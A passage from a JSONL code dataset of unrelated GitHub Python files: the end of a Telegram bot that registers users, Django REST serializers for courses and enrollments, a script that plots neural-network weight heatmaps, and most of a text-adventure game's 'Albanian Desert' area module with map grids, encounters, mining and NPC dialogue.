os.getenv(\"TLG_CLIENT\")\nproxy_server = os.getenv(\"TLG_PROXY_SERVER\")\nproxy_port = int(os.getenv(\"TLG_PROXY_PORT\"))\nproxy_key = os.getenv(\"TLG_PROXY_KEY\")\n\nproxy = (proxy_server, proxy_port, proxy_key)\nbot = TelegramClient(app_name, app_api_id, app_api_hash,\n connection=connection.ConnectionTcpMTProxyRandomizedIntermediate,\n proxy=proxy)\nbot.start(bot_token=bot_token)\n\n# client = [] # клиент\n\n@bot.on(events.NewMessage(pattern='/start'))\nasync def start(event):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n await event.respond('Привет!\\nЧтобы войти в диалог нужно ввести команду /AddUser')\n raise events.StopPropagation\n\n@bot.on(events.NewMessage(pattern='/AddUser'))\nasync def echo(event): \n # диалог с запросом информации нужной для работы команды /AddUser\n await event.respond(\"Выполняется команда /AddUSer\")\n chat_id = event.chat_id\n async with bot.conversation(chat_id) as conv:\n #response = conv.wait_event(events.NewMessage(incoming=True))\n await conv.send_message(\"Привет! Введите номер id пользователя\"\\\n \"который нужно добавить для доступа к боту:\")\n id_new_user = await conv.get_response()\n id_new_user = id_new_user.message \n # id пользователя должен быть числом\n while not any(x.isdigit() for x in id_new_user):\n await conv.send_message(\"ID нового пользователя - это число. Попробуйте еще раз.\")\n id_new_user = await conv.get_response()\n id_new_user = id_new_user.message\n # print(\"id_new_user \", id_new_user) \n await conv.send_message(f\"Добавили нового пользователя с ID: {id_new_user}\")\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n bot.run_until_disconnected()\n\nif __name__ == '__main__':\n main()","repo_name":"kaefik/py-template","sub_path":"telegrambot/ex-tlg-bot-conversation.py","file_name":"ex-tlg-bot-conversation.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72756263630","text":"from rest_framework import serializers\n\nfrom e_campus.models import Course\nfrom e_campus.models import Student\nfrom e_campus.models import Enrollment\n\n\nclass CourseSerializer(serializers.ModelSerializer):\n class Meta:\n model = Course\n fields = (\"description\", \"duration\", \"holder_image\", \"name\")\n\n\nclass StudentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Student\n fields = (\n \"avatar\",\n \"name\",\n \"nickname\",\n \"phone\",\n )\n\n\nclass EnrollmentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Enrollment\n fields = (\n \"course\",\n \"date_close\",\n \"date_enroll\",\n \"score\",\n \"status\",\n \"student\",\n )\n","repo_name":"LePiN/virtual_academy","sub_path":"e_academy/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"16289692631","text":"import sys\nimport glob\nimport os\nimport ast\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom model_loader import *\n\ndef draw_nn_map_figure(model_dir):\n ml = ModelLoader(model_dir)\n _,step,AME = ml.get_scalar('loss/mean_absolute_error_1')\n _,step,AME_test = ml.get_scalar('loss/mean_absolute_error_test_1')\n\n plt.suptitle(model_dir)\n ax = plt.subplot(121)\n plt.title(\"$w_{in}$\")\n w_in = ml.get_values_of_variable_by_name('fc_in/weights:0')\n w_max = np.amax(np.absolute(w_in))\n #sns.heatmap(w_in, linewidth=0.5, cbar_kws={\"orientation\": \"horizontal\"})\n im = plt.imshow(w_in, cmap='seismic', interpolation='nearest', vmax=w_max, vmin=-w_max)\n cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\n ax = plt.subplot(164)\n plt.title(\"$b_{in}$\")\n b_in = ml.get_values_of_variable_by_name('fc_in/biases:0')\n b_in = np.expand_dims(b_in, axis=1)\n #sns.heatmap(b_in, linewidth=0.5, xticklabels=False, cbar_kws={\"orientation\": \"horizontal\"})\n im = plt.imshow(b_in, cmap='seismic', interpolation='nearest')\n cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\n ax = plt.subplot(165)\n plt.title(\"$w_{out}$\")\n w_out = ml.get_values_of_variable_by_name('fc_out/weights:0')\n #sns.heatmap(w_out, linewidth=0.5, xticklabels=False, cbar_kws={\"orientation\": \"horizontal\"})\n im = plt.imshow(w_out, cmap='seismic', interpolation='nearest')\n cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n \n ax = plt.subplot(166)\n plt.title(\"$b_{out}$\")\n b_out = ml.get_values_of_variable_by_name('fc_out/biases:0')\n b_out = np.expand_dims(b_out, axis=1)\n #sns.heatmap(b_out, linewidth=0.5, xticklabels=False, yticklabels=False, annot=True, fmt=\"f\", cbar=False)\n im = plt.imshow(b_out, cmap='seismic', interpolation='nearest')\n cbar = fig.colorbar(ax=ax, mappable=im, orientation='horizontal')\n\nfrom bash_file_tools import *\n\n# usage: python model_loader_nn_maps.py '../logs/nn_logs/features_few/Rc*/z-score/*/*' model_nn_maps/\nmodel_dirs_bash_path = sys.argv[1]\nout_dir = sys.argv[2]\nmodel_dirs = list_bash_files(model_dirs_bash_path)\n\nfig = plt.figure(1, figsize=(16, 8.5))\n\nfor i,model_dir in enumerate(model_dirs):\n fig.clf()\n draw_nn_map_figure(model_dir)\n Rc = model_dir\n fig_save_path = os.path.join(out_dir, \"nn_map_\" + str(i) + \".pdf\")\n fig.savefig(fig_save_path)\n print(fig_save_path, \"saved.\")\n\n\n","repo_name":"EmilBahnsen/bachelor-master","sub_path":"visualization/model_loader_nn_maps.py","file_name":"model_loader_nn_maps.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12810796250","text":"\"\"\"\nFile: TUAAlbanianDesert.py\nAuthor: Ben Gardner\nCreated: December 25, 2013\nRevised: August 26, 2023\n\"\"\"\n\n\nimport random\nfrom TUAStatics import Static\n\n\nclass AlbanianDesert:\n\n name = \"Albanian Desert\"\n audio = \"Duststorm\"\n\n def __init__(self, character):\n self.view = None\n self.imageIndex = None\n self.text = None\n self.menu = None\n self.helpText = None\n self.tempFlag = None\n self.c = character\n self.movementVerb = \"walk\"\n \n if \"Gold Mined\" not in self.c.flags:\n self.c.flags['Gold Mined'] = {1: 0,\n 2: 0,\n 3: 0,\n 4: 0}\n\n wrp1 = self.westernKosovo1\n wrp2 = self.westernKosovo2\n wrp3 = self.westernKosovo3\n wrp4 = self.westernKosovo4\n wrp5 = self.westernKosovo5\n wrp6 = self.romadanVillageEntrance\n wrp7 = self.romadanVillageExit\n scut = self.scutariPassage\n nml1 = self.normal1\n nml2 = self.normal2\n nml3 = self.normal3\n notU = self.notUp\n notD = self.notDown\n notR = self.notRight\n notL = self.notLeft\n upRt = self.upRight\n upLt = self.upLeft\n dnRt = self.downRight\n nooE = self.nookEntrance\n dnLt = self.downLeft\n down = self.down\n left = self.left\n watU = self.waterUp\n watD = self.waterDown\n watR = self.waterRight\n watL = self.waterLeft\n waUR = self.waterDownLeft\n waUL = self.waterDownRight\n waDR = self.waterUpLeft\n waDL = self.waterUpRight\n gld1 = self.goldMine1\n gld2 = self.goldMine2\n gld3 = self.goldMine3\n gld4 = self.goldMine4\n hotC = self.hotCoalsTeacher\n wel1 = self.well1\n wel2 = self.well2\n cast = self.castle\n wal1 = self.wall1\n wal2 = self.wall2\n geys = self.geyser\n paca = None if \"Volcano Ointment\" not in self.c.flags and (\"Oukkar\" in self.c.flags['Kills'] or \"Plugged Geyser\" not in self.c.flags) else self.alpaca\n \n \n self.spots = [\n [None, None, None, None, None, None, None, None, None, None, None, None],\n [None, None, down, None, None, None, None, None, None, None, None, None],\n [None, None, notL, dnLt, None, wrp1, None, None, None, None, None, None],\n [None, None, notL, notR, None, notL, wrp2, None, None, None, None, None],\n [None, scut, nml1, nml2, notU, nml2, nml1, wrp3, wrp4, None, None, None],\n [None, notL, nml2, nml3, nml2, nml1, nml2, nml3, nml2, wrp5, None, None],\n [None, notL, nml3, nml2, nml1, watD, watD, watD, nml1, notR, None, None],\n [None, upRt, hotC, nml1, watR, None, None, None, watL, nml3, dnLt, None],\n [None, None, None, notL, watD, waDL, None, None, waUR, gld1, notR, None],\n [None, None, dnRt, waUL, None, watL, waDL, None, None, waUR, notR, None],\n [None, None, watU, None, None, watL, wel1, waDL, None, None, watU, None],\n [None, None, None, None, waDR, nml3, nml2, watR, None, watD, None, None],\n [None, None, None, waDR, nml3, watD, watD, nml2, watU, nml2, left, None],\n [None, None, None, notL, watR, None, None, watL, nml2, notR, None, None],\n [None, None, None, upRt, watR, None, None, watL, nml1, upLt, None, None],\n [None, None, None, None, notL, watU, watU, nml1, notR, None, None, None],\n [None, None, None, None, notL, nml2, gld2, nml2, nml3, dnLt, None, None],\n [None, None, None, None, notL, nml1, nml2, nml3, nml2, upLt, None, None],\n [None, None, None, None, wrp6, wrp6, wrp6, wrp6, wrp6, None, None, None],\n [None, None, None, None, None, None, None, None, None, None, None, None],\n [None, None, None, None, wrp7, wrp7, wrp7, wrp7, wrp7, None, None, None],\n [None, None, None, None, notL, nml1, notD, notD, upLt, None, None, None],\n [None, None, None, None, upRt, nml2, None, None, None, None, None, None],\n [None, None, None, None, None, upRt, cast, notU, notU, left, None, None],\n [None, None, None, None, None, None, None, notL, notR, None, None, None],\n [None, None, None, None, nooE, notU, notU, nml3, nml2, dnLt, None, None],\n [None, None, paca, None, notL, watD, watD, nml2, nml1, gld3, dnLt, None],\n [None, None, geys, notU, watR, None, None, watL, nml2, nml3, upLt, None],\n [None, None, None, upRt, watR, None, None, watL, nml3, upLt, None, None],\n [None, None, None, None, notL, watU, watU, wel2, notR, None, None, None],\n [None, None, None, None, notL, nml2, nml3, nml2, nml1, dnLt, None, None],\n [None, None, None, None, upRt, nml3, nml2, nml1, nml2, notR, None, None],\n [None, None, None, None, None, upRt, gld4, nml2, nml3, upLt, None, None],\n [None, None, None, None, None, None, notL, nml3, notR, None, None, None],\n [None, None, None, None, None, None, upRt, nml2, notR, None, None, None],\n [None, None, None, None, None, None, None, wal1, wal2, None, None, None],\n [None, None, None, None, None, None, None, None, None, None, None, None]]\n \n if self.c.level < 14: # 25%\n e = {'Diggler': 13,\n 'Romadan Horseman': 7,\n 'Warlock': 3}\n elif self.c.level == 14: # 24%\n e = {'Romadan Horseman': 6,\n 'Warlock': 10,\n 'Gold Golem': 6,\n 'Adurbid': 2}\n elif self.c.level == 15: # 23%\n e = {'Warlock': 5,\n 'Gold Golem': 11,\n 'Adurbid': 5,\n 'Dust Dweller': 2}\n elif self.c.level == 16: # 22%\n e = {'Gold Golem': 5,\n 'Adurbid': 10,\n 'Dust Dweller': 5,\n 'Albanian Gladiator': 2}\n elif self.c.level == 17: # 21%\n e = {'Adurbid': 4,\n 'Dust Dweller': 9,\n 'Albanian Gladiator': 4,\n 'Gritty Assailant': 2}\n elif self.c.level == 18: # 20%\n e = {'Dust Dweller': 4,\n 'Albanian Gladiator': 8,\n 'Gritty Assailant': 4,\n 'Shadow Sniper': 2}\n elif self.c.level == 19: # 19%\n e = {'Albanian Gladiator': 4,\n 'Gritty Assailant': 7,\n 'Shadow Sniper': 4,\n 'Shadow Hunter': 2}\n elif self.c.level == 20: # 18%\n e = {'Gritty Assailant': 4,\n 'Shadow Sniper': 6,\n 'Shadow Hunter': 4,\n 'Giant Scorpion1': 2}\n elif self.c.level > 20: # 17%\n e = {'Shadow Sniper': 4,\n 'Shadow Hunter': 5,\n 'Giant Scorpion1': 4,\n 'Manticore': 2}\n\n if self.c.level < 14 or self.c.level > 16:\n e['Gold Golem'] = 2\n\n e['Mirage'] = 4\n \n self.encounters = {wrp1: {},\n wrp2: {},\n wrp3: {},\n wrp4: {},\n wrp5: {},\n wrp6: {},\n wrp7: {},\n scut: {},\n nml1: e,\n nml2: e,\n nml3: e,\n notU: e,\n notD: e,\n notR: e,\n notL: e,\n upRt: e,\n upLt: e,\n dnRt: e,\n nooE: e,\n dnLt: e,\n down: e,\n left: e,\n watU: e,\n watD: e,\n watR: e,\n watL: e,\n waUR: e,\n waUL: e,\n waDR: e,\n waDL: e,\n gld1: e,\n gld2: e,\n gld3: e,\n gld4: e,\n hotC: e,\n wel1: {},\n wel2: {},\n cast: {},\n wal1: {},\n wal2: {},\n geys: {},\n paca: {}\n }\n \n def movementActions(self):\n self.c.ep -= 3\n if self.c.ep < 0:\n excess = 0 - self.c.ep\n self.c.ep += excess\n self.c.hp -= excess\n\n def actions(self, newActions=None):\n actions = {'view': self.view,\n 'image index': self.imageIndex,\n 'text': self.text,\n 'menu': self.menu,\n 'italic text': self.helpText}\n if newActions:\n actions.update(newActions)\n return actions\n\n def westernKosovo1(self, selectionIndex=None):\n X = 1\n Y = 5\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo2(self, selectionIndex=None):\n X = 2\n Y = 6\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo3(self, selectionIndex=None):\n X = 3\n Y = 7\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo4(self, selectionIndex=None):\n X = 4\n Y = 7\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def westernKosovo5(self, selectionIndex=None):\n X = 5\n Y = 8\n return self.actions({'area': \"Western Kosovo\",\n 'coordinates': (X, Y)})\n\n def romadanVillageEntrance(self, selectionIndex=None):\n X = 2\n Y = 2\n return self.actions({'area': \"Romadan Village\",\n 'coordinates': (X, Y)})\n\n def romadanVillageExit(self, selectionIndex=None):\n X = 2\n Y = 6\n return self.actions({'area': \"Romadan Village\",\n 'coordinates': (X, Y)})\n\n def scutariPassage(self, selectionIndex=None):\n if selectionIndex == 0:\n self.c.flags['Sliding'] = True\n X = 6\n Y = 4\n return self.actions({'area': \"Scutari Peninsula\",\n 'coordinates': (X, Y)})\n self.view = \"travel\"\n self.imageIndex = 0\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Crawling\" in self.c.flags:\n del self.c.flags['Crawling']\n self.text = (\"You crawl up the sand passage.\")\n else:\n self.text = (\"There is a dark, sloping tunnel in the sand dune.\")\n self.menu = [\"Go through the tunnel.\"]\n return self.actions()\n\n def normal1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 1\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def normal2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 2\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def normal3(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 3\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def notUp(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 4\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def notDown(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 5\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def notRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 6\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def notLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 7\n self.text = None\n self.helpText = None\n self.menu = []\n if \"Albanian Desert\" not in self.c.flags:\n self.text = (\"You feel weakened by the desert heat.\")\n self.c.flags['Albanian Desert'] = True\n return self.actions()\n\n def upRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 8\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def upLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 9\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def downRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 10\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def nookEntrance(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 0\n self.text = None\n self.helpText = None\n self.menu = []\n \n if selectionIndex == 0:\n return Static.ICA_DATA['Ica 5']\n if \"Oukkar\" in self.c.flags['Kills'] and (self.c.dexterity >= 75 or \"All Access Pass\" in self.c.flags):\n self.text = (\"\\nYou spot a hidden passage up into the dune \"+\n \"that appears to be accessible.\")\n self.menu = [\"Enter the dune.\"]\n elif \"Oukkar\" in self.c.flags['Kills']:\n self.text = (\"\\nYou spot a passage up into the dune \"+\n \"that looks like it may be accessible, were you more \"+\n \"dextrous.\")\n return self.actions()\n\n def downLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 11\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def down(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 13\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def left(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 14\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterUp(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 15\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterDown(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 16\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 17\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 18\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterDownLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 19\n self.text = None\n self.helpText = None\n self.menu = []\n if ( \"Qendresa Albanian Desert Remark\" not in self.c.flags and\n self.c.hasMercenary(\"Qendresa\")):\n self.c.flags['Qendresa Albanian Desert Remark'] = True\n self.text = \"Qendresa: Look what has become of Albania...\"\n return self.actions()\n\n def waterDownRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 20\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterUpLeft(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 21\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def waterUpRight(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 22\n self.text = None\n self.helpText = None\n self.menu = []\n return self.actions()\n\n def goldMine1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 1\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMine2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 2\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMine3(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 3\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMine4(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 23\n self.text = None\n self.helpText = None\n self.menu = []\n\n goldMineId = 4\n \n return self.goldMineMain(goldMineId, selectionIndex)\n\n def goldMineMain(self, goldMineId, selectionIndex):\n if selectionIndex == 0:\n roll = random.randint(1, 5)\n if roll == 1:\n self.text = (\"You mine some gold ore!\")\n self.c.flags['Gold Mined'][goldMineId] = self.c.level+1\n return self.actions({'item': \"Gold Ore\"})\n else:\n hpLoss = random.randint(10, 50)\n if self.c.isPolite:\n ouchLine = \"\\n%s: Yow!\" % self.c.NAME\n else:\n ouchLine = \"\\n%s: Fuck!\" % self.c.NAME\n self.text = (\"You swing your weapon at the rock, recoiling\"\n \" and injuring\"+\n \" yourself for %s damage.\" % hpLoss+\n ouchLine)\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += random.choice(\n [\"\\nQendresa: Be careful.\",\n \"\\nQendresa: Try again, you are almost there.\",\n \"\\nQendresa: Shall I take a swing?\" +\n \"\\n%s: I've got it.\" % self.c.NAME])\n self.c.hp -= hpLoss\n self.menu = [\"Mine the gold rock.\"]\n elif self.c.level > self.c.flags['Gold Mined'][goldMineId]:\n self.text = \"You come across a rock containing rare gold ore.\"\n self.menu = [\"Mine the gold rock.\"]\n else:\n self.text = \"You see a mined gold rock.\"\n return self.actions()\n\n def hotCoalsTeacher(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 5\n self.text = None\n self.helpText = None\n self.menu = []\n npc = \"Mysterious Red Wizard\"\n skill = \"Hot Coals\"\n if skill+\" Learned\" in self.c.flags:\n if selectionIndex == 0:\n return self.actions({'skill': \"Hot Coals\",\n 'cost': 0})\n self.text = \"You feel the remnants of a magical presence in this area.\"\n self.menu = [\"Absorb some magical remnants.\"]\n elif selectionIndex == 0:\n self.text = (\"%s: I'm not a big cowboy, but ok.\" % self.c.NAME+\n \"\\n\"+npc+\": Hserf tae!\"+\n \"\\nThe wizard flicks his wand and teleports away.\")\n self.c.flags[skill] = True\n self.c.flags[skill+\" Learned\"] = True\n return self.actions({'skill': skill,\n 'cost': 0})\n elif selectionIndex == 1:\n random.seed(self.c.level)\n self.text = (\"%s: No way in hell, you psycho!\" % self.c.NAME+\n \"\\n%s: So be it. Fartface.\" % npc+\n \"\\nThe wizard teleports away, leaving magic dust.\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That guy was a knucklehead.\")\n randomHpBoost = random.randint(-5, 15)\n if randomHpBoost < 0:\n self.text += (\"\\nYour maximum HP decreased by %s!\" % -randomHpBoost)\n elif randomHpBoost > 0:\n self.text += (\"\\nYour maximum HP increased by %s!\" % randomHpBoost)\n self.c.maxHp += randomHpBoost\n self.c.flags[skill] = True\n elif skill not in self.c.flags:\n self.imageIndex = 24\n self.c.flags['New Song'] = \"Buddha\"\n self.text = (npc+\": Howdy, big cowboy. Wanna \"+\n \"fill that noggin with knowledge?\")\n self.menu = [\"\\\"Yes.\\\"\",\n \"\\\"No!\\\"\"]\n return self.actions()\n\n def well1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 25\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n event = random.choice([\"Energy\", \"Heal\", \"Poison\"])\n self.text = \"You drink some water. \"\n if event == \"Energy\":\n self.text += (\"You feel re-energized.\")\n self.c.ep += 20\n elif event == \"Heal\":\n self.text += (\"You feel restored.\")\n self.c.hp += 20\n elif event == \"Poison\":\n self.text += (\"You feel sick.\")\n self.c.hp -= 30\n else:\n self.text = (\"You come across an old well.\")\n if \"Well\" not in self.c.flags:\n self.text = (\"\\n%s: This is familiar.\" % self.c.NAME)\n self.c.flags['Well'] = True\n self.menu = [\"Drink from the well.\"]\n return self.actions()\n\n def well2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 26\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n event = random.choice([\"Energy\", \"Heal\", \"Chunk\"])\n self.text = \"You drink some water. \"\n if event == \"Energy\":\n self.text += (\"You feel re-energized.\")\n self.c.ep += 20\n elif event == \"Heal\":\n self.text += (\"You feel restored.\")\n self.c.hp += 20\n elif event == \"Chunk\":\n self.text += (\"There is a chunk of dirt in it.\")\n self.c.hp -= 30\n else:\n self.text = (\"You come across a dusty well.\")\n if \"Well\" not in self.c.flags:\n self.text = (\"\\n%s: This is familiar.\" % self.c.NAME)\n self.c.flags['Well'] = True\n self.menu = [\"Drink from the well.\"]\n return self.actions()\n\n def castle(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 27\n self.text = None\n self.helpText = None\n self.menu = []\n if selectionIndex == 0:\n X = 1\n Y = 13\n return self.actions({'area': \"Gambino Castle\",\n 'coordinates': (X, Y)})\n if \"Gambino Castle\" not in self.c.flags:\n self.text = (\"%s: Why is there a giant castle in the middle of\" % self.c.NAME +\n \" the desert?\")\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: This...this must be the hiding\" +\n \" place of that despicable Italian president.\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That's a weird place to live.\")\n self.c.flags['Gambino Castle'] = True\n self.menu = [\"Enter the castle.\"]\n return self.actions()\n\n def wall1(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 28\n self.text = None\n self.helpText = None\n self.menu = []\n return self.wall(selectionIndex)\n\n def wall2(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 29\n self.text = None\n self.helpText = None\n self.menu = []\n return self.wall(selectionIndex)\n\n def wall(self, selectionIndex=None):\n if ( selectionIndex == 0 and\n \"Greek Wall Hole\" not in self.c.flags):\n self.text = (\"You swing at the crack and a large pile of stone\" +\n \" crumbles from the wall.\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That's how you make an entrance!\")\n self.menu = [\"Enter the wall.\"]\n self.c.flags['Greek Wall Hole'] = True\n elif (selectionIndex == 0 and\n \"Greek Wall Hole\" in self.c.flags):\n X = 1\n Y = 2\n return self.actions({'area': \"Hidden Passage\",\n 'coordinates': (X, Y)})\n elif (\"Blueprint\" not in self.c.flags and\n \"Greek Wall\" not in self.c.flags):\n self.text = (\"You reach a massive wall bordering Greece.\" +\n \"\\n%s: If only I could find a way around this\" % self.c.NAME +\n \" wall.\")\n self.c.flags['Greek Wall'] = True\n elif (\"Blueprint\" in self.c.flags and\n \"Greek Wall Hole\" not in self.c.flags):\n self.text = (\"%s: Ok, so it says on the blueprint\" % self.c.NAME +\n \" that there should be a hole at this crack.\")\n self.menu = [\"Hit the crack.\"]\n elif \"Greek Wall Hole\" in self.c.flags:\n self.menu = [\"Enter the wall.\"]\n return self.actions()\n \n def geyser(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 30\n self.text = None\n self.helpText = None\n self.menu = []\n \n if selectionIndex == 0:\n self.c.flags['Plugged Geyser'] = True\n if \"Oukkar\" in self.c.flags['Kills']:\n self.c.removeItem(self.c.indexOfItem(\"Olympian Ointment\"))\n self.c.flags['Volcano Ointment'] = True\n X = 2\n Y = 27\n return self.actions({'area': \"Albanian Desert\",\n 'coordinates': (X, Y),\n 'sound': \"Unlock Area\"})\n elif \"Plugged Geyser\" not in self.c.flags:\n self.c.flags['Oukkar Entrance Found'] = True\n self.text = (\"There is a large geyser blocking the way.\" +\n \" The pressure\" +\n \" is too strong to be stopped by physical means.\")\n if \"Hailstorm\" in [skill.NAME for skill in self.c.skills]:\n self.menu = [\"Cast Hailstorm.\"]\n elif \"Plugged Geyser Aftermath\" not in self.c.flags:\n self.imageIndex = 31\n self.text = (\"You form a layer of ice atop the geyser.\")\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: Yaouw!\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: That's a funny noise.\")\n self.text += (\"\\nQendresa: No, look to the horizon.\" +\n \"\\nQendresa points to a volcano in the distance.\")\n elif self.c.hasMercenary(\"Barrie\"):\n self.text += (\"\\nBarrie: Way to stay coolheaded...in a\" +\n \" heated situation.\")\n self.c.flags['Plugged Geyser Aftermath'] = True\n elif \"Oukkar\" not in self.c.flags['Kills']:\n self.imageIndex = 31\n self.text = (\"There is a magical force far ahead.\")\n elif \"Volcano Ointment\" in self.c.flags:\n self.imageIndex = 31\n if \"Volcano Ointment Aftermath\" in self.c.flags:\n self.text = \"You see Yaouw Volcano in the distance.\"\n else:\n self.c.flags['Volcano Ointment Aftermath'] = True\n self.text = \"You apply a vial of Olympian Ointment to the area.\"\n if self.c.hasMercenary(\"Barrie\"):\n self.text += \"\\nBarrie: And what do you think that's gonna do?\"\n self.text += \"\\nYaouw Volcano re-emerges!\"\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: Yaouw!\")\n if self.c.hasMercenary(\"Barrie\"):\n self.text += \"\\nBarrie: Wow. Really didn't expect that to work.\"\n elif \"Niplin\" not in self.c.flags['Kills']:\n self.imageIndex = 32\n if \"Volcano Aftermath\" not in self.c.flags:\n self.c.flags['Volcano Aftermath'] = True\n self.text = (\"You slide down the mountain. The volcano collapses behind you.\")\n else:\n self.text = (\"The hot sun still shines mightily.\")\n if self.c.hasMercenary(\"Qendresa\"):\n self.text += (\"\\nQendresa: Come, let us continue our quest.\")\n if self.c.hasItem(\"Olympian Ointment\") and \"Volcano Ointment\" not in self.c.flags:\n self.menu = [\"Apply Olympian Ointment.\"]\n else:\n self.imageIndex = 33\n self.text = (\"You stare into the horizon in wonder.\")\n if self.c.hasItem(\"Olympian Ointment\") and \"Volcano Ointment\" not in self.c.flags:\n self.menu = [\"Apply Olympian Ointment.\"]\n elif self.c.hasMercenary(\"Qendresa\"):\n self.text += random.choice(\n [\"\\nQendresa: We have certainly come a long way.\",\n \"\\nQendresa: What are you thinking about?\",\n \"\\nQendresa: Yaouw once stood here.\"]\n )\n\n return self.actions()\n \n def alpaca(self, selectionIndex=None):\n self.view = \"travel\"\n self.imageIndex = 34\n self.text = None\n self.helpText = None\n 